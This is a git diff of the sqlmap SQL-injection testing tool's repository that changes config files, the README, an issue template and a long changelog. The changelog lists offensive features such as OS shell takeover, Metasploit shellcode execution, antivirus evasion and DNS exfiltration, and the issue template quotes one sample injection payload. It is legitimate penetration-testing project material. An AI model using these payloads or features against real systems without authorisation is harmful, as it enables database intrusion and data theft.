diff --git a/.gitattributes b/.gitattributes index a6b6a3526..806cf1b9a 100644 --- a/.gitattributes +++ b/.gitattributes @@ -1,5 +1,8 @@ -*.py text eol=lf *.conf text eol=lf +*.md text eol=lf +*.md5 text eol=lf +*.py text eol=lf +*.xml text eol=lf *_ binary *.dll binary diff --git a/.gitignore b/.gitignore index ff18ea796..81f587778 100644 --- a/.gitignore +++ b/.gitignore @@ -2,4 +2,5 @@ output/ .sqlmap_history traffic.txt -*~ \ No newline at end of file +*~ +.idea/ \ No newline at end of file diff --git a/.travis.yml b/.travis.yml new file mode 100644 index 000000000..7bfe0cef7 --- /dev/null +++ b/.travis.yml @@ -0,0 +1,6 @@ +language: python +python: + - "2.6" + - "2.7" +script: + - python -c "import sqlmap; import sqlmapapi" diff --git a/ISSUE_TEMPLATE.md b/ISSUE_TEMPLATE.md new file mode 100644 index 000000000..062912bd6 --- /dev/null +++ b/ISSUE_TEMPLATE.md @@ -0,0 +1,26 @@ +## What's the problem (or question)? + + + +## Do you have an idea for a solution? + + + +## How can we reproduce the issue? + +1. +2. +3. +4. + +## What are the running context details? + +* Installation method (e.g. `pip`, `apt-get`, `git clone` or `zip`/`tar.gz`): +* Client OS (e.g. `Microsoft Windows 10`) +* Program version (`python sqlmap.py --version` or `sqlmap --version` depending on installation): +* Target DBMS (e.g. `Microsoft SQL Server`): +* Detected WAF/IDS/IPS protection (e.g. `ModSecurity` or `unknown`): +* SQLi techniques found by sqlmap (e.g. `error-based` and `boolean-based blind`): +* Results of manual target assessment (e.g. found that the payload `query=test' AND 4113 IN ((SELECT 'foobar'))-- qKLV` works): +* Relevant console output (if any): +* Exception traceback (if any): diff --git a/README.md b/README.md index 8115c5dd5..ae16583ff 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ -sqlmap -== +# sqlmap +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. @@ -18,7 +18,7 @@ You can download the latest tarball by clicking [here](https://github.com/sqlmap Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository: - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and **2.7.x** on any platform. @@ -33,8 +33,8 @@ To get a list of all options and switches use: python sqlmap.py -hh -You can find a sample run [here](https://gist.github.com/stamparm/5335217). 
-To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki). +You can find a sample run [here](https://asciinema.org/a/46601). +To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage). Links ---- @@ -45,9 +45,6 @@ Links * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * User's manual: https://github.com/sqlmapproject/sqlmap/wiki * Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap * Twitter: [@sqlmap](https://twitter.com/sqlmap) * Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) * Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots @@ -55,8 +52,14 @@ Links Translations ---- +* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md) * [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md) * [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md) +* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md) * [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md) * [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md) +* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md) +* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md) * [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md) +* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md) +* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md) diff --git a/doc/CHANGELOG.md b/doc/CHANGELOG.md index e656280cc..1e3284055 100644 --- a/doc/CHANGELOG.md +++ b/doc/CHANGELOG.md @@ -1,14 +1,12 @@ -# Version 1.0 (upcoming) +# Version 1.0 (2016-02-27) * Implemented support for automatic decoding of page content through detected charset. * Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.). * Major improvements to program stabilization based on user reports. * Added new tampering scripts avoiding popular WAF/IPS/IDS mechanisms. -* Added support for setting Tor proxy type together with port. * Fixed major bug with DNS leaking in Tor mode. * Added wordlist compilation made of the most popular cracking dictionaries. -* Added support for mnemonics substantially helping user with program setup. -* Implemented multi-processor hash cracking routine(s) on Linux OS. +* Implemented multi-processor hash cracking routine(s). * Implemented advanced detection techniques for inband and time-based injections by usage of standard deviation method. 
* Old resume files are now deprecated and replaced by faster SQLite based session mechanism. * Substantial code optimization and smaller memory footprint. @@ -28,9 +26,72 @@ * Added switch `--check-waf` for checking of existence of WAF/IPS/IDS protection. * Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables. * Added switch `--count` to count the number of entries for a specific table or all database(s) tables. -* Major improvements to switches --tables and --columns. -* Takeover switch --os-pwn improved: stealthier, faster and AV-proof. -* Added switch --mobile to imitate a mobile device through HTTP User-Agent header. +* Major improvements to switches `--tables` and `--columns`. +* Takeover switch `--os-pwn` improved: stealthier, faster and AV-proof. +* Added switch `--mobile` to imitate a mobile device through HTTP User-Agent header. +* Added switch `-a` to enumerate all DBMS data. +* Added option `--alert` to run host OS command(s) when SQL injection is found. +* Added option `--answers` to set user answers to asked questions during sqlmap run. +* Added option `--auth-file` to set HTTP authentication PEM cert/private key file. +* Added option `--charset` to force character encoding used during data retrieval. +* Added switch `--check-tor` to force checking of proper usage of Tor. +* Added option `--code` to set HTTP code to match when query is evaluated to True. +* Added option `--cookie-del` to set character to be used while splitting cookie values. +* Added option `--crawl` to set the crawling depth for the website starting from the target URL. +* Added option `--crawl-exclude` for setting regular expression for excluding pages from crawling (e.g. `"logout"`). +* Added option `--csrf-token` to set the parameter name that is holding the anti-CSRF token. +* Added option `--csrf-url` for setting the URL address for extracting the anti-CSRF token. +* Added option `--csv-del` for setting the delimiting character that will be used in CSV output (default `,`). +* Added option `--dbms-cred` to set the DBMS authentication credentials (user:password). +* Added switch `--dependencies` for turning on the checking of missing (non-core) sqlmap dependencies. +* Added switch `--disable-coloring` to disable console output coloring. +* Added option `--dns-domain` to set the domain name for usage in DNS exfiltration attack(s). +* Added option `--dump-format` to set the format of dumped data (`CSV` (default), `HTML` or `SQLITE`). +* Added option `--eval` for setting the Python code that will be evaluated before the request. +* Added switch `--force-ssl` to force usage of SSL/HTTPS. +* Added switch `--hex` to force usage of DBMS hex function(s) for data retrieval. +* Added option `-H` to set extra HTTP header (e.g. `"X-Forwarded-For: 127.0.0.1"`). +* Added switch `-hh` for showing advanced help message. +* Added option `--host` to set the HTTP Host header value. +* Added switch `--hostname` to turn on retrieval of DBMS server hostname. +* Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method. +* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS/IDS protection. +* Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized). +* Added switch `--invalid-bignum` for usage of big numbers while invalidating values. +* Added switch `--invalid-logical` for usage of logical operations while invalidating values. +* Added switch `--invalid-string` for usage of random strings while invalidating values. 
+* Added option `--load-cookies` to set the file containing cookies in Netscape/wget format. +* Added option `-m` to set the textual file holding multiple targets for scanning purposes. +* Added option `--method` to force usage of provided HTTP method (e.g. `PUT`). +* Added switch `--no-cast` for turning off payload casting mechanism. +* Added switch `--no-escape` for turning off string escaping mechanism. +* Added option `--not-string` for setting string to be matched when query is evaluated to False. +* Added switch `--offline` to force work in offline mode (i.e. only use session data). +* Added option `--output-dir` to set custom output directory path. +* Added option `--param-del` to set character used for splitting parameter values. +* Added option `--pivot-column` to set column name that will be used while dumping tables by usage of pivot(ing). +* Added option `--proxy-file` to set file holding proxy list. +* Added switch `--purge-output` to turn on safe removal of all content(s) from output directory. +* Added option `--randomize` to set parameter name(s) that will be randomly changed during sqlmap run. +* Added option `--safe-post` to set POST data for sending to safe URL. +* Added option `--safe-req` for loading HTTP request from a file that will be used during sending to safe URL. +* Added option `--skip` to skip testing of given parameter(s). +* Added switch `--skip-static` to skip testing parameters that not appear to be dynamic. +* Added switch `--skip-urlencode` to skip URL encoding of payload data. +* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS/IDS protection. +* Added switch `--smart` to conduct thorough tests only if positive heuristic(s). +* Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi). +* Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt. +* Added option `--test-filter` for test filtration by payloads and/or titles (e.g. `ROW`). +* Added option `--test-skip` for skipping tests by payloads and/or titles (e.g. `BENCHMARK`). +* Added switch `--titles` to turn on comparison of pages based only on their titles. +* Added option `--tor-port` to explicitly set Tor proxy port. +* Added option `--tor-type` to set Tor proxy type (`HTTP` (default), `SOCKS4` or `SOCKS5`). +* Added option `--union-from` to set table to be used in `FROM` part of UNION query SQL injection. +* Added option `--where` to set `WHERE` condition to be used during the table dumping. +* Added option `-X` to exclude DBMS database table column(s) from enumeration. +* Added option `-x` to set URL of sitemap(.xml) for target(s) parsing. +* Added option `-z` for usage of short mnemonics (e.g. `"flu,bat,ban,tec=EU"`). # Version 0.9 (2011-04-10) @@ -43,7 +104,7 @@ * Extended old `--dump -C` functionality to be able to search for specific database(s), table(s) and column(s), option `--search`. * Added support to tamper injection data with option `--tamper`. * Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack. -* Added support to enumerate roles on Oracle, --roles switch. +* Added support to enumerate roles on Oracle, `--roles` switch. * Added support for SOAP based web services requests. * Added support to fetch unicode data. * Added support to use persistent HTTP(s) connection for speed improvement, switch `--keep-alive`. @@ -88,18 +149,18 @@ * Major bugs fixed. 
* Cleanup of UDF source code repository, https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack. * Major code cleanup. -* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus softwares that mistakenly mark sqlmap as a malware. +* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus software that mistakenly mark sqlmap as a malware. * Updated user's manual. * Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from http://sqlmap.org/demo.html. # Version 0.8 release candidate (2009-09-21) -* Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. +* Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (`--os-bof`) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. -* Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. -* Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. +* Added support for `--first` and `--last` so the user now has even more granularity in what to enumerate in the query output. +* Minor enhancement to save the session by default in 'output/hostname/session' file if `-s` option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring. @@ -108,13 +169,13 @@ * Adapted Metasploit wrapping functions to work with latest 3.3 development version too. * Adjusted code to make sqlmap 0.7 to work again on Mac OSX too. -* Reset takeover OOB features (if any of --os-pwn, --os-smbrelay or --os-bof is selected) when running under Windows because msfconsole and msfcli are not supported on the native Windows Ruby interpreter. This make sqlmap 0.7 to work again on Windows too. +* Reset takeover OOB features (if any of `--os-pwn`, `--os-smbrelay` or `--os-bof` is selected) when running under Windows because msfconsole and msfcli are not supported on the native Windows Ruby interpreter. This make sqlmap 0.7 to work again on Windows too. * Minor improvement so that sqlmap tests also all parameters with no value (eg. par=). * HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and 2.6+. * Major bug fix to sql-query/sql-shell features. -* Major bug fix in --read-file option. +* Major bug fix in `--read-file` option. * Major silent bug fix to multi-threading functionality. -* Fixed the web backdoor functionality (for MySQL) when (usually) stacked queries are not supported and --os-shell is provided. +* Fixed the web backdoor functionality (for MySQL) when (usually) stacked queries are not supported and `--os-shell` is provided. 
* Fixed MySQL 'comment injection' version fingerprint. * Fixed basic Microsoft SQL Server 2000 fingerprint. * Many minor bug fixes and code refactoring. @@ -136,32 +197,32 @@ * Major enhancement to make the comparison algorithm work properly also on url not stables automatically by using the difflib Sequence Matcher object; * Major enhancement to support SQL data definition statements, SQL data manipulation statements, etc from user in SQL query and SQL shell if stacked queries are supported by the web application technology; * Major speed increase in DBMS basic fingerprint; -* Minor enhancement to support an option (--is-dba) to show if the current user is a database management system administrator; -* Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause bruteforcing; -* Added internal support to forge CASE statements, used only by --is-dba query at the moment; -* Minor layout adjustment to the --update output; +* Minor enhancement to support an option (`--is-dba`) to show if the current user is a database management system administrator; +* Minor enhancement to support an option (`--union-tech`) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause bruteforcing; +* Added internal support to forge CASE statements, used only by `--is-dba` query at the moment; +* Minor layout adjustment to the `--update` output; * Increased default timeout to 30 seconds; * Major bug fix to correctly handle custom SQL "limited" queries on Microsoft SQL Server and Oracle; * Major bug fix to avoid tracebacks when multiple targets are specified and one of them is not reachable; * Minor bug fix to make the Partial UNION query SQL injection technique work properly also on Oracle and Microsoft SQL Server; -* Minor bug fix to make the --postfix work even if --prefix is not provided; +* Minor bug fix to make the `--postfix` work even if `--prefix` is not provided; * Updated documentation. 
# Version 0.6.3 (2008-12-18) * Major enhancement to get list of targets to test from Burp proxy (http://portswigger.net/suite/) requests log file path or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) 'conversations/' folder path by providing option -l ; * Major enhancement to support Partial UNION query SQL injection technique too; -* Major enhancement to test if the web application technology supports stacked queries (multiple statements) by providing option --stacked-test which will be then used someday also by takeover functionality; -* Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option --time-test; +* Major enhancement to test if the web application technology supports stacked queries (multiple statements) by providing option `--stacked-test` which will be then used someday also by takeover functionality; +* Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option `--time-test`; * Minor enhancement to fingerprint the web server operating system and the web application technology by parsing some HTTP response headers; * Minor enhancement to fingerprint the back-end DBMS operating system by parsing the DBMS banner value when -b option is provided; -* Minor enhancement to be able to specify the number of seconds before timeout the connection by providing option --timeout #, default is set to 10 seconds and must be 3 or higher; -* Minor enhancement to be able to specify the number of seconds to wait between each HTTP request by providing option --delay #; -* Minor enhancement to be able to get the injection payload --prefix and --postfix from user; +* Minor enhancement to be able to specify the number of seconds before timeout the connection by providing option `--timeout #`, default is set to 10 seconds and must be 3 or higher; +* Minor enhancement to be able to specify the number of seconds to wait between each HTTP request by providing option `--delay #`; +* Minor enhancement to be able to get the injection payload `--prefix` and `--postfix` from user; * Minor enhancement to be able to enumerate table columns and dump table entries, also when the database name is not provided, by using the current database on MySQL and Microsoft SQL Server, the 'public' scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle; -* Minor enhancemet to support also --regexp, --excl-str and --excl-reg options rather than only --string when comparing HTTP responses page content; -* Minor enhancement to be able to specify extra HTTP headers by providing option --headers. By default Accept, Accept-Language and Accept-Charset headers are set; -* Minor improvement to be able to provide CU (as current user) as user value (-U) when enumerating users privileges or users passwords; +* Minor enhancemet to support also `--regexp`, `--excl-str` and `--excl-reg` options rather than only `--string` when comparing HTTP responses page content; +* Minor enhancement to be able to specify extra HTTP headers by providing option `--headers`. 
By default Accept, Accept-Language and Accept-Charset headers are set; +* Minor improvement to be able to provide CU (as current user) as user value (`-U`) when enumerating users privileges or users passwords; * Minor improvements to sqlmap Debian package files; * Minor improvement to use Python psyco (http://psyco.sourceforge.net/) library if available to speed up the sqlmap algorithmic operations; * Minor improvement to retry the HTTP request up to three times in case an exception is raised during the connection to the target url; @@ -175,10 +236,10 @@ # Version 0.6.2 (2008-11-02) -* Major bug fix to correctly dump tables entries when --stop is not specified; +* Major bug fix to correctly dump tables entries when `--stop` is not specified; * Major bug fix so that the users' privileges enumeration now works properly also on both MySQL < 5.0 and MySQL >= 5.0; * Major bug fix when the request is POST to also send the GET parameters if any have been provided; -* Major bug fix to correctly update sqlmap to the latest stable release with command line --update; +* Major bug fix to correctly update sqlmap to the latest stable release with command line `--update`; * Major bug fix so that when the expected value of a query (count variable) is an integer and, for some reasons, its resumed value from the session file is a string or a binary file, the query is executed again and its new output saved to the session file; * Minor bug fix in MySQL comment injection fingerprint technique; * Minor improvement to correctly enumerate tables, columns and dump tables entries on Oracle and on PostgreSQL when the database name is not 'public' schema or a system database; @@ -191,20 +252,20 @@ * Major bug fix to blind SQL injection bisection algorithm to handle an exception; * Added a Metasploit Framework 3 auxiliary module to run sqlmap; * Implemented possibility to test for and inject also on LIKE statements; -* Implemented --start and --stop options to set the first and the last table entry to dump; -* Added non-interactive/batch-mode (--batch) option to make it easy to wrap sqlmap in Metasploit and any other tool; +* Implemented `--start` and `--stop` options to set the first and the last table entry to dump; +* Added non-interactive/batch-mode (`--batch`) option to make it easy to wrap sqlmap in Metasploit and any other tool; * Minor enhancement to save also the length of query output in the session file when retrieving the query output length for ETA or for resume purposes; * Changed the order sqlmap dump table entries from column by column to row by row. Now it also dumps entries as they are stored in the tables, not forcing the entries' order alphabetically anymore; -* Minor bug fix to correctly handle parameters' value with % character. +* Minor bug fix to correctly handle parameters' value with `%` character. 
# Version 0.6 (2008-09-01) * Complete code refactor and many bugs fixed; * Added multithreading support to set the maximum number of concurrent HTTP requests; -* Implemented SQL shell (--sql-shell) functionality and fixed SQL query (--sql-query, before called -e) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack; -* Added an option (--privileges) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator; -* Added support (-c) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (--save) to save command line options on a configuration file; -* Created a function that updates the whole sqlmap to the latest stable version available by running sqlmap with --update option; +* Implemented SQL shell (`--sql-shell`) functionality and fixed SQL query (`--sql-query`, before called `-e`) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack; +* Added an option (`--privileges`) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator; +* Added support (`-c`) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (`--save`) to save command line options on a configuration file; +* Created a function that updates the whole sqlmap to the latest stable version available by running sqlmap with `--update` option; * Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.) installation binary packages; * Created sqlmap .exe (Windows) portable executable; * Save a lot of more information to the session file, useful when resuming injection on the same target to not loose time on identifying injection, UNION fields and back-end DBMS twice or more times; @@ -216,8 +277,8 @@ * Improved XML files structure; * Implemented the possibility to change the HTTP Referer header; * Added support to resume from session file also when running with inband SQL injection attack; -* Added an option (--os-shell) to execute operating system commands if the back-end DBMS is MySQL, the web server has the PHP engine active and permits write access on a directory within the document root; -* Added a check to assure that the provided string to match (--string) is within the page content; +* Added an option (`--os-shell`) to execute operating system commands if the back-end DBMS is MySQL, the web server has the PHP engine active and permits write access on a directory within the document root; +* Added a check to assure that the provided string to match (`--string`) is within the page content; * Fixed various queries in XML file; * Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted the library to parse it; * Fixed password fetching function, mainly for Microsoft SQL Server and reviewed the password hashes parsing function; @@ -225,7 +286,7 @@ * Enhanced logging system: added three more levels of verbosity to show also HTTP sent and received traffic; * Enhancement to handle Set-Cookie from target url and automatically re-establish the Session when it expires; * Added support to inject also on Set-Cookie parameters; -* Implemented TAB completion and command history on both --sql-shell and --os-shell; +* Implemented TAB completion and command history on both `--sql-shell` and `--os-shell`; * Renamed some command line options; * Added a conversion library; * Added code schema and reminders for future developments; @@ -237,19 +298,19 @@ # Version 0.5 
(2007-11-04) * Added support for Oracle database management system -* Extended inband SQL injection functionality (--union-use) to all other possible queries since it only worked with -e and --file on all DMBS plugins; +* Extended inband SQL injection functionality (`--union-use`) to all other possible queries since it only worked with `-e` and `--file` on all DMBS plugins; * Added support to extract database users password hash on Microsoft SQL Server; * Added a fuzzer function with the aim to parse HTML page looking for standard database error messages consequently improving database fingerprinting; * Added support for SQL injection on HTTP Cookie and User-Agent headers; -* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Splitted getValue() into getInband() and getBlind(); +* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Split getValue() into getInband() and getBlind(); * Major enhancements in common library and added checkForBrackets() method to check if the bracket(s) are needed to perform a UNION query SQL injection attack; -* Implemented --dump-all functionality to dump entire DBMS data from all databases tables; -* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries (--exclude-sysdbs); +* Implemented `--dump-all` functionality to dump entire DBMS data from all databases tables; +* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries (`--exclude-sysdbs`); * Implemented in Dump.dbTableValues() method the CSV file dumped data automatic saving in csv/ folder by default; * Added DB2, Informix and Sybase DBMS error messages and minor improvements in xml/errors.xml; * Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/ column are specified to be dumped; * Important fixes in lib/option.py to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function __setCSVDir() and fixed also in lib/dump.py; -* Minor enhancement in lib/injection.py to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (q) the for cycle when using the google dork option (-g); +* Minor enhancement in lib/injection.py to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (q) the for cycle when using the google dork option (`-g`); * Minor fix in lib/request.py to properly encode the url to request in case the "fixed" part of the url has blank spaces; * More minor layout enhancements in some libraries; * Renamed DMBS plugins; @@ -260,21 +321,21 @@ * Added DBMS fingerprint based also upon HTML error messages parsing defined in lib/parser.py which reads an XML file defining default error messages for each supported DBMS; * Added Microsoft SQL Server extensive DBMS fingerprint checks based upon accurate '@@version' parsing matching on an XML file to get also the exact patching level of the DBMS; -* Added support for query ETA (Estimated Time of Arrival) real time calculation (--eta); -* Added support to extract database management system users password hash on MySQL and PostgreSQL (--passwords); +* Added support for query ETA (Estimated Time of Arrival) real time calculation (`--eta`); +* Added support to 
extract database management system users password hash on MySQL and PostgreSQL (`--passwords`); * Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation ; -* Implemented Google dorking feature (-g) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS; +* Implemented Google dorking feature (`-g`) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS; * Improved logging functionality: passed from banal 'print' to Python native logging library; -* Added support for more than one parameter in '-p' command line option; -* Added support for HTTP Basic and Digest authentication methods (--basic-auth and --digest-auth); -* Added the command line option '--remote-dbms' to manually specify the remote DBMS; -* Major improvements in union.UnionCheck() and union.UnionUse() functions to make it possible to exploit inband SQL injection also with database comment characters ('--' and '#') in UNION query statements; -* Added the possibility to save the output into a file while performing the queries (-o OUTPUTFILE) so it is possible to stop and resume the same query output retrieving in a second time (--resume); -* Added support to specify the database table column to enumerate (-C COL); -* Added inband SQL injection (UNION query) support (--union-use); +* Added support for more than one parameter in `-p` command line option; +* Added support for HTTP Basic and Digest authentication methods (`--basic-auth` and `--digest-auth`); +* Added the command line option `--remote-dbms` to manually specify the remote DBMS; +* Major improvements in union.UnionCheck() and union.UnionUse() functions to make it possible to exploit inband SQL injection also with database comment characters (`--` and `#`) in UNION query statements; +* Added the possibility to save the output into a file while performing the queries (`-o OUTPUTFILE`) so it is possible to stop and resume the same query output retrieving in a second time (`--resume`); +* Added support to specify the database table column to enumerate (`-C COL`); +* Added inband SQL injection (UNION query) support (`--union-use`); * Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements; * Reviewed the directory tree structure; -* Splitted lib/common.py: inband injection functionalities now are moved to lib/union.py; +* Split lib/common.py: inband injection functionalities now are moved to lib/union.py; * Updated documentation files. 
# Version 0.3 (2007-01-20) @@ -282,10 +343,10 @@ * Added module for MS SQL Server; * Strongly improved MySQL dbms active fingerprint and added MySQL comment injection check; * Added PostgreSQL dbms active fingerprint; -* Added support for string match (--string); -* Added support for UNION check (--union-check); +* Added support for string match (`--string`); +* Added support for UNION check (`--union-check`); * Removed duplicated code, delegated most of features to the engine in common.py and option.py; -* Added support for --data command line argument to pass the string for POST requests; +* Added support for `--data` command line argument to pass the string for POST requests; * Added encodeParams() method to encode url parameters before making http request; * Many bug fixes; * Rewritten documentation files; diff --git a/CONTRIBUTING.md b/doc/CONTRIBUTING.md similarity index 74% rename from CONTRIBUTING.md rename to doc/CONTRIBUTING.md index 1de4a195d..31b389e60 100644 --- a/CONTRIBUTING.md +++ b/doc/CONTRIBUTING.md @@ -1,38 +1,37 @@ -# Contributing to sqlmap - -## Reporting bugs - -**Bug reports are welcome**! -Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues). - -### Guidelines - -* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant. -* Make sure you can reproduce the bug with the latest development version of sqlmap. -* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal. -* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?* -* If you are not sure whether something is a bug, or want to discuss a potential new feature before putting in an enhancement request, the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) is a good place to bring it up. - -## Submitting code changes - -All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37). - -Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests). -Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next! - -### Guidelines - -In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions: - -* Each patch should make one logical change. -* Wrap code to 76 columns when possible. -* Avoid tabbing, use four blank spaces instead. 
-* Before you put time into a non-trivial patch, it is worth discussing it on the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) or privately by [email](mailto:dev@sqlmap.org). -* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected. -* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests. -* Style that is too different from main branch will be ''adapted'' by the developers side. -* Do not touch anything inside `thirdparty/` and `extra/` folders. - -### Licensing - -By submitting code contributions to the sqlmap developers, to the mailing list, or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them. +# Contributing to sqlmap + +## Reporting bugs + +**Bug reports are welcome**! +Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues). + +### Guidelines + +* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) 